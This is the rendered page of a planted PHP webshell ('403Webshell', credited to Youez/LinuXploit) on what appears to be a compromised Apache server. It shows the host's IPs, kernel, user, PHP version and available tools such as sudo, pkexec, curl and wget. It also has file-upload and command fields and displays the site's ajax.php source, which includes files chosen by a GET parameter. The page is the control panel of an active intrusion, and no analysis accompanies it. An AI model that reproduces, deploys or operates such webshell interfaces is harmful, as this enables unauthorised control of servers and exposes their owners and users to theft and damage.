403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.68
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/nymp/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/nymp/www/ajax.php
<?php
	session_start();
	require_once('mod/_sanitize.php');
	define('TIMEZONE', 'America/New_York');
	include_once('config.php');
	date_default_timezone_set(APP_TIMEZONE);
	$db = new PDO(DB_CONNECT_STRING, DB_USER, DB_PWD);
	if (!$db) :
		die('Could not connect: ' . 'Database Error!');
	else :
		$sql_tz = "SET time_zone = '".APP_TIMEZONE."'";
		$db->query($sql_tz);
		$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
	endif;
	$authorized_call = 1; 
	require_once('mod/_functions.php'); 
	$call = addslashes($_GET['call']);
	$bypass_session_timeout = $_GET['bypass_session_timeout'];
	if (page_allowed($call)) :
		if ($call != 'logout_check' && $bypass_session_timeout != 'true') :
			if (!empty($_SESSION['logged_in'])) :
				$_SESSION['timeout'] = time() + $app_timeout;
			endif;
		endif;
		include_once('mod/'.$call.'.php');
	else :
		echo 'Not Authorized!';
	endif;
?>

Youez - 2016 - github.com/yon3zu
LinuXploit